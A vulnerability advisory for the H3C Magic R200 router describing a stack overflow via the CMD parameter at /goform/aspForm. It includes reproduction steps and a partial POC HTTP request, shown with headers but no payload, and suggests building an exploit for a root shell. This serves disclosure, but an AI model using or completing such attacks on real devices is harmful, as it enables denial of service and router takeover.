# H3C Magic R200 was discovered stack overflow via CMD parameter at /goform/aspForm
###### tags: `H3C` `Magic R200`
author:Wolin Zhuang, Yifeng Li;
## Vulnerability Description
H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via CMD parameter at /goform/aspForm.
## Vulnerability Details
The content obtained by the program through the CMD parameter is passed to v6, and then v6 is copied into `&cmdBuff`, the size of v6 is not checked, and there is a buffer overflow vulnerability.
## Recurring vulnerabilities and POC
In order to reproduce the vulnerability, the following steps can be followed:
1. Upgrade router Magic_R200 to newest version(we have a physical machine)
2. Login to 192.168.124.1 as admin
3. Attack with the following POC
POST /goform/aspForm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Accept-Encoding: gzip, deflate
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN_PSD_REM_FLAG=
By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service.
And you can write your own exp to get the root shell.